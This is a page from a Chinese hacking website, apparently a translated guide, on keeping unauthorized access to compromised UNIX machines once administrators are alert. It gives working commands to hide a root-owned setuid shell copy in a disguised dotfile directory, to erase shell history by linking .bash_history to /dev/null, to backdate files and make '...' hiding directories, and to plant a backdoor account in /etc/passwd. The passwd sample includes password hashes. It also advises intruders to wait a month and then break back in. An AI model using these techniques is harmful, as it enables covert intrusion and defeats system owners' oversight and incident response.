华域联盟 网络安防 从UNIX系统获取密码档(三)

从UNIX系统获取密码档(三)

一些诀窍

Root和Demon的工具包及特洛伊木马

--------------------------------------------------------------------------------

保持访问权限的方法有很多。虽然在你学习本文时,可能正将要失去在某些主机上

的访问权限,但我希望本文中的一些经验可以使你成为一名“坚固”的Hacker。

一些诀窍

这里提供的一些“诀窍”可以帮助你保持在主机上的权限。一旦系统管理员发现了

你,他们会在一旁监视你和你在该系统上所做的每一件事,他们还会重新编译二进制文件

、更改每个用户的密码、拒绝来自你所在主机的访问、隐藏passwd和shadow档、检查有

SUID的文件,等等......

如果你发现自己已经暴露了,不要试图再次闯入该系统。我就曾经目睹了一些人因为

试图通过安装特洛伊木马、使用其他帐号或以前所设置的“后门”再次获取权限而被捕。

仔细想一下,他们在监视你......你在系统中的一举一动、精心设计的程序都会他们知道!

千万不要这样!请等待!当一个月后,他们会以为事情已经过去而放松警惕。这时,

你就可以利用他们遗漏的系统漏洞之一再次进入该系统,并尝试恢复你以前所做的工作。

OK。以下就是这些“诀窍”。

历史文件:

--------------

总是把你的.bash_history文件链接到/dev/null。否则,至少要编辑它。记住,.bash_history

会记录你在退出登录前所输入的命令。举个例子,如果你编辑它,它就会记录到你正在

编辑它。你或许可以在另外的shell中编辑它,但这似乎有点多余,只要把它输出到/dev/null

就行了。

1. 如果在用户目录下有.bash_history文件,删除它。

2. 在用户根目录下输入命令:ln -s /dev/null .bash_history

“藏身”目录:

-----------------

总是在系统找一个目录作为你的文件的“藏身之所”。这里提供几个大多数用户几乎

从来没有浏览过的目录。

在用户根目录中寻找.term,在该目录下只有一个termrc可执行文件。系统管理员及其同类

用户都已惯于看到这个隐藏目录,但几乎从未进入此目录。如果你们进入了这个目录,你想

他们对此目录下的termrc可执行文件有何感想呢?对了。没有。。。因为他们认为这个文件

正在它应该在的地方。

好了。让我们把termrc变大一点,并加上suid权限。。。你明白其中的意思吧???我

想你能猜得到。;-) 然后切换到/bin目录并输入:

cp bash(或sh等之类的shell) ~username/.term/termrc

chown root ~username/.term/termrc

chgrp root~username/.term/termrc

chmod s ~username/.term/termrc

现在,你有一个可以随时成为root用户的文件,而且不易被系统管理员发现。如果你希望

做得更好一点,可以修改文件日期,使其看起来是一个“旧”文件。

另外,还有一些是每个用户必有但却可能从未使用过的目录,如 .elm 、.term 、mail。你还

可以尝试建立“...”目录,由于它紧跟在两个特殊目录“.”和“..”之后,不易被察觉,因此

是简单可行的。当用ls -al察看时,显示如下内容:

1024 Jan 29 21:03 .

1024 Dec 28 00:12 ..

1024 Jan 29 21:03 ...

509 Mar 02 1996 .bash_history

22 Feb 20 1996 .forward

164 May 18 1996 .kermrc

34 Jun 06 1993 .less

114 Nov 23 1993 .lessrc

1024 May 18 1996 .term

1024 May 19 1996 public_html

看见它所处的位置了吗?

但如果使用 ls -l命令,只会显示如下内容:

1024 May 19 1996 public_html

记住,你也可以寻找一些具有很长名字的文件路径,而且一般没有人想进入它。

利用它来作为你的“藏身”目录,当然,你甚至可以在那里建立“..,”目录。;-)

制作新命令

--------------------

在你检查cron是否已经使用MD5加密后,你或许希望将所设计的程序复制到另一

个不同的文件以保存在系统中;以或者是覆盖一个你知道从未有人使用过的命令。

复制文件时应注意修改文件日期,不然迟早系统管理员都将修复系统,使你所设计的

程序都是白费心机。

更好的方法是为所要使用的shell取另外的新名字,并使它具有suid权限。

增加或修改登录密码

---------------------------------

另一个可行的“后门”是在passwd档中增加新用户,并尽量使它看起来象是原来

就有的。尽量不要使用这个新用户密码,不要用它登录,只是在你失去了原有权限时

才将它派上用场。

特点:这个用户不必是容易引起注意的root用户;你可以在任何需要的时候成为

root用户。以下是一个实例:

We want to make our account look like it belongs, so lets keep to thetop of

the file.

root:fVi3YqWnkd4rY:0:0:root:/root:/bin/bash

sysop:mZjb4XjnJT1Ys:582:200:System Operator:/home/sysop:/bin/bash

bin:*:1:1:bin:/bin:

daemon:*:2:2:daemon:/sbin:

adm:*:3:4:adm:/var/adm:

lp:*:4:7:lp:/var/spool/lpd:

sync:*:5:0:sync:/sbin:/bin/sync

shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown

halt:*:7:0:halt:/sbin:/sbin/halt


上一页
1
2
下一页
阅读全文

本文由 华域联盟 原创撰写:华域联盟 » 从UNIX系统获取密码档(三)

转载请保留出处和原文链接:https://www.cnhackhy.com/127922.htm

本文来自网络,不代表华域联盟立场,转载请注明出处。

作者: sterben

学习在 MAC系统上给 PDF文件加密的方法

发表回复

联系我们

联系我们

2551209778

在线咨询: QQ交谈

邮箱: [email protected]

工作时间:周一至周五,9:00-17:30,节假日休息

关注微信
微信扫一扫关注我们

微信扫一扫关注我们

关注微博
返回顶部